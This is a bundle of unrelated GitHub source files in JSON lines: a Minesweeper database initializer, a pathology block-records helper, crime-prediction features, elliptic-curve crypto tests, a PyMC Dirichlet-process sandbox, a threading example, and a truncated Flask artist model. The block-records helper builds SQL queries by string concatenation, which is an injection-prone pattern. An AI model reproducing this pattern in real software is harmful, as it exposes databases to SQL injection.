+{"seq_id":"7535255994","text":"from db_connection import get_database_connection\n\n\ndef drop_tables(connection):\n    \"\"\"drops all tables\n\n    Args:\n        connection (sqlite3.Connection): connection to .db file\n    \"\"\"\n    cursor = connection.cursor()\n\n    cursor.execute(\"DROP TABLE IF EXISTS _8x8;\")\n    cursor.execute(\"DROP TABLE IF EXISTS _16x16;\")\n    cursor.execute(\"DROP TABLE IF EXISTS _24x16;\")\n\n    connection.commit()\n\n\ndef create_tables(connection):\n    \"\"\"creates tables\n\n    Args:\n        connection (sqlite3.Connection): connection to .db file\n    \"\"\"\n\n    cursor = connection.cursor()\n\n    cursor.execute(\n        \"CREATE TABLE _8x8 (id integer PRIMARY KEY, name TEXT, time FLOAT);\")\n    cursor.execute(\n        \"CREATE TABLE 
_16x16 (id integer PRIMARY KEY, name TEXT, time FLOAT);\")\n cursor.execute(\n \"CREATE TABLE _24x16 (id integer PRIMARY KEY, name TEXT, time FLOAT);\")\n\n connection.commit()\n\n\ndef initialize_database():\n \"\"\"gets database connection or makes the file, clears it, and then creates tables\n \"\"\"\n connection = get_database_connection()\n\n drop_tables(connection)\n create_tables(connection)\n","repo_name":"thefakejj/Minesweeper","sub_path":"src/initialize_database.py","file_name":"initialize_database.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23970187600","text":"import helper_function.ask_y_n_statement as ask\nimport sql.add_update_sql as sql\nimport helper_function.pccm_names as names\nimport pandas as pd\nfrom reports.ffpe_db_new import NewBlock\n\n\nclass BlockInformation:\n\n def __init__(self, conn, cursor, file_number):\n self.file_number = file_number\n self.cursor = cursor\n self.conn = conn\n self.table_name = 'block_list'\n\n def get_block_id(self, col_filter_value):\n block_columns = ['file_number'] + names.block_list('all')\n block_list = sql.extract_multiple_value_select_column(self.conn, block_columns, table=self.table_name,\n file_number=self.file_number, col_select='block_id',\n col_filter='block_type',\n col_filter_value=col_filter_value)\n block_id = ask.ask_list(str(col_filter_value) + ' block id information is to be entered for: ', block_list+\n ['not available', 'Other'])\n block_list = ask.flatten_nested_list(block_list)\n if block_id not in set(block_list):\n number_of_blocks = 'not available'\n else:\n number_of_blocks = sql.get_value(col_name='number_of_blocks', table='block_list', pk_name='file_number',\n pk=self.file_number, cursor=self.cursor, error_statement=\"Enter number of \"\n \"blocks: \")\n return str(block_id), str(number_of_blocks)\n\n def get_block_pk (self, user_name, col_filter_value, col_select='block_id', col_filter='block_type'):\n #retrieves a list of block_ids that correspond to a particular col_filter (block_type, file_number etc)\n new_block = NewBlock(self.conn, self.cursor, user_name)\n block_columns = ['file_number'] + names.block_list('all')\n block_list = sql.extract_multiple_value_select_column(self.conn, block_columns, self.table_name,\n self.file_number, col_select, col_filter,\n col_filter_value)\n block_id = ask.ask_list(str(col_filter_value) + ' block id information is to be entered for: ', block_list +\n ['not available', 'Other'])\n block_list = ask.flatten_nested_list(block_list)\n if block_id not in set(block_list):\n new_block.add_new_pk(self.file_number, block_type=col_filter_value)\n pk, number_of_blocks = self.get_block_information(block_id, block_data= ['pk', 'number_of_blocks'])\n else:\n sql_statement = (\"SELECT pk FROM block_list WHERE (block_id = '\" + block_id + \"')\")\n self.cursor.execute(sql_statement)\n pk_ = self.cursor.fetchall()\n pk = pk_[0][0]\n number_of_blocks = sql.get_value(col_name='number_of_blocks', table='block_list', pk_name='pk', pk=pk,\n cursor=self.cursor, error_statement=\"Enter number of blocks: \")\n return pk, str(block_id), number_of_blocks\n\n def get_block_information(self, block_id, block_data):\n if block_id == 'not available':\n search_col = 'file_number'\n search_val = self.file_number\n else:\n search_col = 'block_id'\n search_val = block_id\n sql_statement = (\"SELECT DISTINCT \" + ', '.join(block_data) + \" FROM block_list WHERE \" + search_col + \"= '\"\n + 
search_val + \"'\")\n df = pd.read_sql(sql_statement, self.conn)\n block_details = []\n for col in block_data:\n block_detail = list(pd.unique(df[col].values))\n if len(block_detail) > 1:\n detail = ask.ask_list('Please choose the correct ' + col + ': ', block_detail + ['not available'])\n block_detail = detail\n block_details.append(block_detail)\n return ask.flatten_nested_list(block_details)\n\n def margin_info(self):\n specimen_resection_size = input('Size of specimen (resection size): ')\n margins = ask.check_number_input('Please input number of resection margin sizes to be entered: ',\n 'Please only input number of margins not type')\n margin_size_df = pd.DataFrame(columns=['margin', 'size'])\n if margins != '0':\n for margin in range(0, int(margins)):\n margin_name = input('Name of margin: ')\n margin_distance = input('Margin Size: ')\n margin_size_df.loc[margin] = [margin_name, margin_distance]\n margin_size_df['margin_size_name'] = margin_size_df['margin'].str.cat(margin_size_df['size'], sep =\": \")\n margin_size = '|'.join(list(margin_size_df['margin_size_name']))\n else:\n margin_size = 'no_margins_described'\n cut_margins = ask.check_number_input('Please input number of cut (shave) margin sizes to be entered: ',\n 'Please only input number of margins not type')\n cut_margin_size_df = pd.DataFrame(columns=['cut_margin', 'size'])\n if cut_margins != '0':\n for cut_margin in range(0, int(cut_margins)):\n cut_margin_name = input('Name of cut_margin: ')\n cut_margin_distance = input('Cut Margin dimensions: ')\n cut_margin_size_df.loc[cut_margin] = [cut_margin_name, cut_margin_distance]\n cut_margin_size_df['cut_margin_size_name'] = cut_margin_size_df['cut_margin'].str.cat(\n cut_margin_size_df['size'], sep=\": \")\n cut_margin_size = '|'.join(list(cut_margin_size_df['cut_margin_size_name']))\n else:\n cut_margin_size = 'cut_margins_not_present'\n margin_report = input('Please input description of margins (involved/free/unremarkable etc as given in the report: ')\n return specimen_resection_size,margin_size,cut_margin_size, margin_report\n\n\n","repo_name":"shwetakadupccm/pccm_db_sk","sub_path":"reports/block_information.py","file_name":"block_information.py","file_ext":"py","file_size_in_byte":6159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21596305639","text":"import pandas as pd\nimport numpy as np\nfrom time import time\nimport matplotlib.pyplot as plt\n\nimport itertools, datetime, sys\n\nfrom sklearn import metrics\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.datasets.species_distributions import construct_grids\nfrom sklearn.neighbors import KernelDensity\nfrom sklearn import preprocessing\n\ndef get_normalizer(column):\n X = np.array(column).reshape(column.shape[0], 1)\n return preprocessing.Normalizer().fit(X)\n\ndef normalize(df, column_name):\n X = np.array(df[column_name]).reshape(df[column_name].shape[0], 1)\n return get_normalizer(df[column_name]).transform(X)\n\ndef get_scaler(column):\n X = np.array(column).reshape(column.shape[0], 1)\n return preprocessing.MinMaxScaler().fit(X)\n\ndef scale(df, column_name):\n X = np.array(df[column_name]).reshape(df[column_name].shape[0], 1)\n return get_scaler(df[column_name]).transform(X)\n\ndef normalize_columns(df, column_names):\n for column_name in column_names:\n df['%s_norm' % column_name] = normalize(df, column_name)\n \ndef scale_columns(df, column_names):\n for column_name in column_names:\n df['%s_scaled' % column_name] = scale(df, 
column_name)\n \ndef get_locations(df, metric='radians', drop_duplicates=True):\n if drop_duplicates:\n locations_df = df[['lat','long']].drop_duplicates()\n else:\n locations_df = df[['lat','long']]\n locations_array = np.vstack([locations_df['lat'],locations_df['long']]).T\n if metric == 'radians':\n locations_array *= np.pi / 180. # Convert lat/long to radians\n return locations_array\n\ndef get_kde(df, drop_duplicates=True, bandwidth=0.00025, rtol=1E-4):\n locations = get_locations(df, drop_duplicates=drop_duplicates)\n #KDE initialization\n kde = KernelDensity(bandwidth=bandwidth, metric='haversine', kernel='gaussian',\\\n algorithm='ball_tree', rtol=rtol, atol=5)\n #fit with given location\n# print(locations.shape, drop_duplicates)\n kde.fit(locations)\n return kde\n\ndef get_weights(df, kernel, metric='radians', lat_label='lat', long_label='long'):\n locations_array = np.vstack([df[lat_label], df[long_label]]).T\n if metric == 'radians':\n locations_array *= np.pi / 180. # Convert lat/long to radians\n if kernel == None:\n return None\n else:\n return np.exp(kernel.score_samples(locations_array))\n \ndef parse_location(loc):\n loc = loc.strip(\"()\").split(',')\n lat = loc[0].strip()\n long = loc[1].strip()\n return float(lat), float(long)\n\ndef parse_cell_range(loc):\n loc = loc.strip(\"()\").split('), (')\n ll = parse_location(loc[0].strip())\n ur = parse_location(loc[1].strip())\n return tuple(ll), tuple(ur)\n \ndef get_weather_data_for_year(year):\n weather_data = pd.read_csv(\"../data/PreProcessed_Weather_Data_%s.csv\"%year)\n weather_data.rename(columns={\"Weather_Date\":\"timestamp\"}, inplace=True)\n return weather_data\n\n \ndef get_spatio_temporal_features(grid_size):\n print(grid_size)\n yelp_df = pd.read_csv(\"../data/Yelp.csv\")\n police_df = pd.read_csv(\"../data/Police.csv\")\n crime_df = pd.read_csv(\"../data/final_Crime.csv\", parse_dates=['timestamp'])\n weather_df = get_weather_data_for_year(2016)\n\n print(\"Spatial\")\n df = pd.read_csv('../grids_full_year_%s.tsv'%grid_size, sep='\\t')\n df['lat'] = df.cell_range.apply(lambda x: (parse_cell_range(x)[0][0]+parse_cell_range(x)[1][0])/2)\n df['long'] = df.cell_range.apply(lambda x: (parse_cell_range(x)[0][1]+parse_cell_range(x)[1][1])/2)\n\n df['police_factor'] = get_weights(df, get_kde(police_df, bandwidth=0.0008))\n df['yelp_factor'] = get_weights(df, get_kde(yelp_df, bandwidth=0.0008, drop_duplicates=False))\n\n theft_kde = get_kde(crime_df[crime_df.ctype == \"theft\"][['lat','long']].reset_index(drop=True),\\\n bandwidth=0.0008, drop_duplicates=False)\n\n other_kde = get_kde(crime_df[crime_df.ctype == \"other\"][['lat','long']].reset_index(drop=True), \\\n bandwidth=0.0008, drop_duplicates=False)\n\n battery_kde = get_kde(crime_df[crime_df.ctype == \"battery\"][['lat','long']].reset_index(drop=True), \\\n bandwidth=0.0008, drop_duplicates=False)\n\n assault_kde = get_kde(crime_df[crime_df.ctype == \"assault\"][['lat','long']].reset_index(drop=True), \\\n bandwidth=0.0008, drop_duplicates=False)\n\n damage_kde = get_kde(crime_df[crime_df.ctype == \"damage\"][['lat','long']].reset_index(drop=True), \\\n bandwidth=0.0008, drop_duplicates=False)\n \n df['theft_factor'] = get_weights(df, theft_kde)\n df['other_factor'] = get_weights(df, other_kde)\n df['battery_factor'] = get_weights(df, battery_kde)\n df['assault_factor'] = get_weights(df, assault_kde)\n df['damage_factor'] = get_weights(df, damage_kde)\n\n crime_kde = get_kde(crime_df, bandwidth=0.0008, drop_duplicates=False)\n df['crime_factor'] = 
get_weights(df, crime_kde)\n\n df.to_csv('../data/spatial/spatial_features_full_year_%s.tsv'%grid_size, sep='\\t', index=False)\n \n print(\"Temporal\")\n df = df.groupby(by=['cell_range','timestamp']).sum()\n\n #get previous day\n df['prev_day_crime_freq'] = df['crime_freq'].shift(1)\n df['prev_day_theft_freq'] = df['theft'].shift(1)\n df['prev_day_other_freq'] = df['other'].shift(1)\n df['prev_day_battery_freq'] = df['battery'].shift(1)\n df['prev_day_assault_freq'] = df['assault'].shift(1)\n df['prev_day_damage_freq'] = df['damage'].shift(1)\n\n #get previous week\n\n temp1 = df[['crime_freq','theft', 'other', 'battery', 'assault', 'damage']].shift(1)\n temp2 = df[['crime_freq','theft', 'other', 'battery', 'assault', 'damage']].shift(2)\n temp3 = df[['crime_freq','theft', 'other', 'battery', 'assault', 'damage']].shift(3)\n temp4 = df[['crime_freq','theft', 'other', 'battery', 'assault', 'damage']].shift(4)\n temp5 = df[['crime_freq','theft', 'other', 'battery', 'assault', 'damage']].shift(5)\n temp6 = df[['crime_freq','theft', 'other', 'battery', 'assault', 'damage']].shift(6)\n temp7 = df[['crime_freq','theft', 'other', 'battery', 'assault', 'damage']].shift(7)\n \n df[['prev_7_days_crime_freq','prev_7_days_theft_freq','prev_7_days_other_freq',\\\n 'prev_7_days_battery_freq','prev_7_days_assault_freq','prev_7_days_damage_freq']] = (temp1+temp2+temp3+temp4+temp5+temp6+temp7)/7\n \n df.reset_index(drop=False, inplace=True)\n \n #remove NaN and set it back to normal index\n df = df[pd.to_datetime(df.timestamp) > datetime.date(2016,1,7)].reset_index(drop=True)\n\n df.to_csv('../data/spatio_temporal/spatial_temporal_features_full_year_%s.tsv'%grid_size, sep='\\t', index=False)\n \n \ngrid_size = int(sys.argv[1])\n\nget_spatio_temporal_features(grid_size)","repo_name":"prakritigupta/crime_prediction","sub_path":"src/feature_extraction.py","file_name":"feature_extraction.py","file_ext":"py","file_size_in_byte":6816,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"73450209107","text":"import unittest\nimport priv\nimport ec\nimport encrypt\nimport decrypt\nimport pub\nimport sys, os\nsys.path.insert(0, os.path.abspath(os.path.join(os.getcwd(), os.pardir)))\nfrom helpers import *\n\nclass crypoTests(unittest.TestCase):\n \n def test_point_encryption(self):\n \n m = ec.point(1,2,priv.A, priv.B, priv.prime)\n cipher = encrypt.encrypt(m, priv.base_point, priv.pub_raised_point)\n m2 = decrypt.decrypt(cipher, priv.exponent)\n \n self.assertEqual(m, m2)\n \n \n def test_full_encryption(self):\n \n text1 = \"all ignorance taboggens into know\"\n \n #import pdb; pdb.set_trace()\n points = encrypt.text_to_points(text1)\n cipher_points = encrypt.encrypt_text(text1)\n text2 = decrypt.decrypt_points(cipher_points)\n \n self.assertEqual(text1, text2)\n \n \n def test_num_to_point_one(self):\n \n p = pub.num_to_point(1)\n self.assertTrue(p.is_valid())\n \n \n def test_num_to_point_many(self):\n \"\"\"\n test that numbers get mapped to unique points\n \"\"\"\n card = 1000\n nums = range(card)\n \n points = [pub.num_to_point(num) for num in nums]\n \n self.assertEqual(len(set(points)), card)\n \n \n def test_num_to_point_to_num(self):\n \n for num in range(15*8)[::4]:\n p = pub.num_to_point(2**num)\n self.assertEqual(pub.point_to_num(p), 2**num)\n \n \n def test_text_to_nums_to_text(self):\n \n text = \"all ignorance jcaesoijfeioasjfeioasjfeioajf\"\n nums = text_to_nums(text)\n text2 = ''.join([num_to_chars(num) for num in nums])\n 
self.assertEqual(text, text2)\n \n \n def test_text_to_text(self):\n \n text = \"all ignorance toboggens \"\n \n points = encrypt.text_to_points(text)\n text2 = decrypt.points_to_text(points)\n \n self.assertEqual(text, text2)\n \n","repo_name":"ihoover/crypto","sub_path":"ecc/tests/test_crypt.py","file_name":"test_crypt.py","file_ext":"py","file_size_in_byte":1979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15207165731","text":"__author__ = 'Anand Patil, anand.prabhakar.patil@gmail.com'\n\n\"\"\"\nDirichlet process classes:\n\n- DPRealization: A Dirichlet process realization. Based on stick-breaking representation,\n but step methods should use other representations.\n\n Attributes:\n - atoms: A list containing the atom locations.\n\n Methods:\n - rand(m): Returns m random values.\n - logp(x): A function returning the log-probability of x.\n\nDP: A stochastic valued as a DP realization.\n\nDPDraw: A stochastic distributed as a DP object's value.\n\nNeal cite: Markov chain random methods for Dirichlet process mixture models.\nAlso study up on Gibbs sampler.\n\nThis should all be written in Pyrex eventually. Many things are screaming for\noptimization. The C++ vector class would be helpful too but that would have\nto be swigged.\n\"\"\"\n\nimport numpy as np\nfrom copy import copy\nfrom pymc import *\n\n\n\ndef draws_to_atoms(draws):\n \"\"\"\n atoms, n = draws_to_atoms(draws)\n\n atoms is a list of the unique elements in draws,\n and n is a list of their corresponding multiplicities.\n\n Needs optimization badly I'm sure.\n \"\"\"\n atoms = []\n n = []\n for element in np.atleast_1d(draws):\n match=False\n for i in xrange(len(atoms)):\n if all(element == atoms[i]):\n n[i] += 1\n match=True\n break\n if not match:\n atoms.append(element)\n n.append(1)\n return atoms, n\n\n\n\ntry:\n\n import pylab as pl\n\n def plot_atoms(DPr):\n \"\"\"\n plot_atoms(DPr)\n\n Plots the atoms of DP realization DPr.\n Base measure must be over the real line.\n \"\"\"\n for pair in zip(DPr.atoms, DPr.n):\n plot([pair[0], pair[0]], [0,pair[1]], 'k-')\n\nexcept ImportError:\n pass\n\n\n\nclass DPRealization(object):\n \"\"\"\n A Dirichlet process realization. This is based on the stick-breaking representation\n rather than the Chinese restaurant process in order to provide a logp method. Step methods are\n free to use the Chinese restaurant process, though.\n\n Arguments:\n - basemeas: The base measure. 
Must be a function which, when called with argument n, returns a value.\n - nu: The whatever parameter.\n - draws (optional): DPRealization can be initialized conditional on previous draws.\n Useful for Gibbs sampling, maybe MH too.\n - basemeas_params: The parameters of the base measure.\n\n Methods:\n - rand(m): Returns m random values.\n - logp(x): Returns the log-probability of x.\n \"\"\"\n\n def __init__(self, basemeas_rand, nu, draws=[], **basemeas_params):\n\n # The base measure and its parameters.\n self.basemeas_rand = basemeas_rand\n self.basemeas_params = basemeas_params\n\n # The tightness parameter.\n self.nu = np.float(nu)\n\n if len(draws)>0:\n atoms, n = draws_to_atoms(draws)\n\n # The number of draws from each atom.\n self.n = n\n\n # The values of the atoms.\n self.atoms = atoms\n\n # Need to triple-check that this is OK!\n # The probability masses of the atoms.\n mass_sofar = rbeta(sum(n), nu)\n if len(n) > 1:\n self.mass = list((rdirichlet(n) * mass_sofar).squeeze())\n else:\n self.mass = [mass_sofar]\n self.mass_sofar = mass_sofar\n self.mass_prod = 1.\n for m in self.mass:\n self.mass_prod *= (1.-m)\n\n else:\n self.n = []\n self.atoms = []\n self.mass = []\n self.mass_sofar = 0.\n self.mass_prod = 1.\n\n def logp(self, value):\n \"\"\"\n F.logp(x)\n\n Returns the log of the probability mass assigned to x.\n Returns -Inf if x is not in self.atoms; this behavior is fine\n for continuous base distributions but incorrect for discrete.\n \"\"\"\n logp_out = 0.\n value = np.atleast_1d(value)\n for val_now in value:\n match=False\n for i in xrange(len(self.atoms)):\n if all(val_now == self.atoms[i]):\n logp_out += log(self.mass[i])\n match=True\n break\n if not match:\n return -Inf\n return logp_out\n\n def rand(self, m=1):\n \"\"\"\n F.rand(m=1)\n\n Returns m values from the random probability distribution.\n \"\"\"\n\n draws = np.empty(m, dtype=float)\n\n for i in xrange(m):\n\n\n # Draw from existing atoms\n if np.random.random() < self.mass_sofar:\n atom_index = int(flib.rcat(np.asarray(self.mass) / self.mass_sofar,0,1,1))\n new_draw = self.atoms[atom_index]\n self.n[atom_index] += 1\n\n # Make new atom\n else:\n\n new_draw = self.basemeas_rand(**self.basemeas_params)\n self.atoms.append(new_draw)\n\n self.n.append(1)\n\n new_mass = self.mass_prod * rbeta(1, self.nu)\n self.mass.append(new_mass)\n self.mass_prod *= 1.-new_mass\n self.mass_sofar += new_mass\n\n draws[i] = new_draw\n\n if m==1:\n draws = draws[0]\n return draws\n\n\n\n\nclass DP(Stochastic):\n \"\"\"\n value: A DP realization.\n\n Parents: 'alpha': concentration parameter, 'base': base probability distribution.\n Base parent must have random() and logp() methods (must be an actual distribution object).\n\n Should get intrinsic set of clusters. 
Step methods will update them with the children.\n A new value should be created conditional on the intrinsic clusters every time a parent is updated.\n \"\"\"\n def __init__(self,\n name,\n basemeas_rand,\n basemeas_logp,\n nu,\n doc=None,\n trace=True,\n value=None,\n cache_depth=2,\n plot=False,\n verbose=0,\n **basemeas_params):\n\n self.basemeas_logp = basemeas_logp\n self.basemeas_rand = basemeas_rand\n self.basemeas_params = basemeas_params\n\n parents = {}\n\n parents['basemeas_logp'] = basemeas_logp\n parents['basemeas_rand'] = basemeas_rand\n parents['basemeas_params'] = basemeas_params\n parents['nu'] = nu\n\n def dp_logp_fun(value, **parents):\n return 0.\n # raise ValueError, 'DPStochastic objects have no logp attribute'\n\n def dp_random_fun(basemeas_logp, basemeas_rand, nu, basemeas_params):\n return DPRealization(basemeas_rand, nu, **basemeas_params)\n\n # If value argument provided, read off intrinsic clusters.\n # If clusters argument provided, well store them.\n # If no clusters argument provided, propose from prior all over the place.\n\n Stochastic.__init__(self, logp=dp_logp_fun, random=dp_random_fun, doc=doc, name=name, parents=parents,\n trace=trace, value=value, dtype=np.object, rseed=True, observed=False, cache_depth=cache_depth,\n plot=plot, verbose=verbose)\n\n\n\n\nclass DPDraw(Stochastic):\n \"\"\"\n value: An array of values.\n\n May want to hide these in the step method,\n but many step methods need them so it's probably better to keep them here:\n N: length of value.\n N_clusters: number of clusters.\n clusters: values of clusters, length-N list.\n cluster_multiplicities: multiplicities of clusters.\n\n Note may want to make these things their own Stochastics, in case people want to have\n Deterministics etc. depending on them or to trace them.\n\n Parent: 'dist': a DPStochastic.\n\n logp: product of base logp evaluated on each cluster (each cluster appears only once\n regardless of multiplicity) plus some function of alpha and the number of clusters.\n \"\"\"\n def __init__( self,\n name,\n DP,\n N=1,\n doc=None,\n trace=True,\n observed=False,\n cache_depth=2,\n plot=True,\n verbose = 0):\n\n self.N = N\n\n def DP_logp_fun(value, dist):\n return dist.logp(value)\n\n def DP_random_fun(dist):\n return dist.rand(N)\n\n Stochastic.__init__(self,\n logp = DP_logp_fun,\n doc=doc,\n name=name,\n parents={'dist': DP},\n random = DP_random_fun,\n trace=trace,\n value=None,\n dtype=float,\n rseed=True,\n observed=observed,\n cache_depth=cache_depth,\n plot=plot,\n verbose = verbose)\n\n self.clusters = lam_dtrm('clusters',lambda draws=self: draws_to_atoms(draws))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nfrom numpy.testing import *\nfrom pylab import *\nclass test_DP(NumpyTestCase):\n\n def check_correspondence(self):\n x_d = linspace(-5.,5.,1000)\n dx = x_d[1] - x_d[0]\n nu = 10\n\n p = nu * dx/sqrt(2.*pi)*exp(-x_d**2)\n DP_approx = rdirichlet(p).squeeze()\n DP_approx = hstack((DP_approx, 1.-sum(DP_approx)))\n\n true_DP = DPRealization(rnormal, nu, mu=0,tau=1)\n true_DP.rand(1000)\n\n clf()\n subplot(2,1,1)\n plot(x_d, DP_approx,'k.',markersize=8)\n subplot(2,1,2)\n plot_atoms(true_DP)\n\n def check_draws(self):\n D = DPRealization(rnormal,100,mu=-10,tau=.1)\n draws = D.rand(1000)\n clf()\n hist(draws)\n\n def check_stochastics(self):\n S = DP('S', rnormal,normal_like, 100, mu=10, tau=.1)\n q = DPDraw('q', S, N=1000)\n clf()\n hist(q.value)\n\n\n\nif __name__=='__main__':\n NumpyTest().run()\n\n\"\"\"\nNote: If you could get a distribution for the multiplicities of the 
currently-\nfound clusters in a DP, could you give its children a logp attribute?\n\nThen you could do something like with the GP: give the DPStochastic an intrinsic\nset of clusters unrelated to its children, assess its logp using only its intrinsic\nclusters, etc.\n\nYes, you can easily do this. Give the DP object its intrinsic clusters, and let the\nstep methods treat those as the things that are really participating in the model\neven though from the user's perspective the entire DP is participating.\n\"\"\"\n\n# Old random method\n# val = []\n# N = len(self.atoms)\n#\n# # Initialize. Optimization 1: keep running sum.\n# if N>0:\n#     sum_n = np.sum(self.n)\n# else:\n#     sum_n = 0\n#\n# float_sumn = np.float(sum_n)\n#\n# for i in xrange(m):\n#\n#     # Optimization 2: update cumulative sum on the fly.\n#     self.tables = np.cumsum(self.n)\n#\n#     # Maybe draw a new atom\n#     if uniform() > float_sumn / (float_sumn+self.nu):\n#         new_val = self.basemeas_rand(**self.basemeas_params)\n#         self.atoms.append(new_val)\n#         self.n.append(1)\n#         N = N + 1\n#\n#     # Otherwise draw from one of the existing atoms\n#     else:\n#         # Optimization 3: Draw uniforms ahead of time.\n#         # DON'T use the same uniform for checking new atom\n#         # creation AND for finding which old atom to draw from,\n#         # you'll introduce painful bias.\n#\n#         unif = uniform() * float_sumn\n#         for i in xrange(N):\n#             if unif < self.tables[i]:\n#                 new_val = self.atoms[i]\n#                 self.n[i] = self.n[i]+1\n#                 break\n#\n#     float_sumn = float_sumn + 1.\n#     val.append(new_val)\n#\n# if m>1:\n#     return array(val, dtype=float)\n# else:\n#     return val[0]\n","repo_name":"matthew-brett/pymc","sub_path":"pymc/sandbox/DP/DP.py","file_name":"DP.py","file_ext":"py","file_size_in_byte":11854,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"48"}
+{"seq_id":"15736361286","text":"import concurrent.futures\nimport time\n\n# Thread Pools: Collection of threads that can be reused for multiple tasks\n\ndef worker():\n    print('starting work')\n    time.sleep(2)\n    print('Done')\n\npool = concurrent.futures.ThreadPoolExecutor(max_workers=2) # Maximum number of threads in this pool is 2\n\nfor _ in range(3): \n    pool.submit(worker) # Because we are creating three instances but the max number of threads in this pool is two, the worker function will be executed at most two times concurrently; once one of the threads completes its execution, that thread will be reused to perform the task a third time\n\npool.shutdown() # similar to .join(), this ensures all of the threads have completed their execution before the program continues\n\nprint('Main Thread Activated')","repo_name":"pranav142/Threading-Tutorial","sub_path":"Course_1/Threading-1-4.py","file_name":"Threading-1-4.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"522463804","text":"import datetime\nfrom sqlalchemy.orm import backref\nfrom models import Genre,Show\nfrom app import db, format_datetime\n\n\nclass Artist(db.Model):\n    __tablename__ = 'Artist'\n    id = db.Column(db.Integer, primary_key=True)\n    name = db.Column(db.String)\n    city = db.Column(db.String(120))\n    state = db.Column(db.String(120))\n    phone = db.Column(db.String(120))\n    genres = db.relationship(\n        'Genre', secondary=Genre.artist_genre_table, backref=db.backref('artists'))\n    image_link = db.Column(db.String(500))\n    website = db.Column(db.String(120))\n    facebook_link = db.Column(db.String(200))\n    seeking_venue = 
db.Column(db.Boolean, default=True)\n    seeking_description = db.Column(db.String(300), default=\"\")\n    shows = db.relationship('Show', backref='artist', lazy=True)\n\n    def __repr__(self):\n        return f''\n\n\ndef getArtists():\n    data = []\n    artists = Artist.query.all()\n\n    for artist in artists:\n        data.append({\n            \"id\": artist.id,\n            \"name\": artist.name\n        })\n\n    return data\n\n\ndef getArtist(id):\n    artist = Artist.query.get(id)\n    current_time = datetime.datetime.now()\n\n    shows_upcoming = Show.Show.query.join(Artist).filter(Artist.id == id).filter(Show.Show.start_time > current_time)\n    shows_past = Show.Show.query.join(Artist).filter(Artist.id == id).filter(Show.Show.start_time < current_time )\n    \n    upcoming_shows = []\n    past_shows = []\n\n    for shows in shows_upcoming:\n        data = {\n            \"venue_id\": shows.venue_id,\n            \"venue_name\": shows.venue.name,\n            \"venue_image_link\": shows.venue.image_link,\n            \"start_time\": format_datetime(str(shows.start_time))\n        }\n        upcoming_shows.append(data)\n\n    for shows in shows_past:\n        data = {\n            \"venue_id\": shows.venue_id,\n            \"venue_name\": shows.venue.name,\n            \"venue_image_link\": shows.venue.image_link,\n            \"start_time\": format_datetime(str(shows.start_time))\n        }\n        past_shows.append(data)\n\n\n    genres = [genre.name for genre in artist.genres]\n\n    data = {\n        \"id\": artist.id,\n        \"name\": artist.name,\n        \"genres\": genres,\n        \"city\": artist.city,\n        \"state\": artist.state,\n        \"phone\": artist.phone,\n        \"facebook_link\": artist.facebook_link,\n        \"image_link\": artist.image_link,\n        \"past_shows\": past_shows,\n        \"upcoming_shows\": upcoming_shows,\n        \"past_shows_count\": len(past_shows),\n        \"upcoming_shows_count\": len(upcoming_shows)\n    }\n    return data\n\n\ndef getArtistS(search):\n    artists = Artist.query.filter(Artist.name.ilike(f'%{search}%'))\n\n    data = {\n        \"count\": artists.count(),\n        \"data\": artists\n    }\n\n    return data\n\n\ndef editArtist(id, name, phone, state, city, genres, image, facebook):\n    status = False\n    try:\n        artist = Artist.query.get(id)\n        artist.name = name\n        artist.phone = phone\n        artist.state = state\n        artist.city = city\n        artist.image_link = image\n        artist.facebook_link = facebook\n        db.session.commit()\n        status = True\n\n        artist.genres = []\n\n        # Checking if the genre exists, if not creating it.\n        for genre in genres:\n            IsGenre = Genre.Genre.query.filter_by(name=genre).one_or_none()\n            if IsGenre:\n                artist.genres.append(IsGenre)\n            else:\n                Genre.Genre.addGenre(genre)\n                # re-query the genre that was just added; IsGenre is None in this branch,\n                # so appending it directly would append None to the relationship\n                newGenre = Genre.Genre.query.filter_by(name=genre).one_or_none()\n                artist.genres.append(newGenre)\n        # commit the genre changes as well; the earlier commit ran before the loop\n        db.session.commit()\n    except:\n        db.session.rollback()\n\n    finally:\n        db.session.close()\n    return status\n\n\ndef addArtist(name, phone, state, city, genres, image, facebook, seeking_venue, seeking_description, website):\n    status = False\n    print(name, phone, state, city, genres, image, facebook,\n          seeking_venue, seeking_description, website)\n    try:\n\n        artist = Artist(\n            name=name,\n            city=city,\n            state=state,\n            phone=phone,\n            seeking_venue=seeking_venue,\n            seeking_description=seeking_description,\n\n            website=website,\n            image_link=image,\n            facebook_link=facebook)\n\n        print(genres)\n        for genre in genres:\n            IsGenre = Genre.Genre.query.filter_by(name=genre).one_or_none()\n\n            if IsGenre:\n\n                artist.genres.append(IsGenre)\n\n            else:\n                newGenre = Genre.Genre(name=genre)\n                print(newGenre.name)\n                db.session.add(newGenre)\n                artist.genres.append(newGenre)\n\n        db.session.add(artist)\n        db.session.commit()\n        status = True\n\n    except:\n        db.session.rollback()\n    finally:\n        db.session.close()\n    return status\n\n\ndef removeArtist(id):\n    status = False\n    try:\n        artist = 
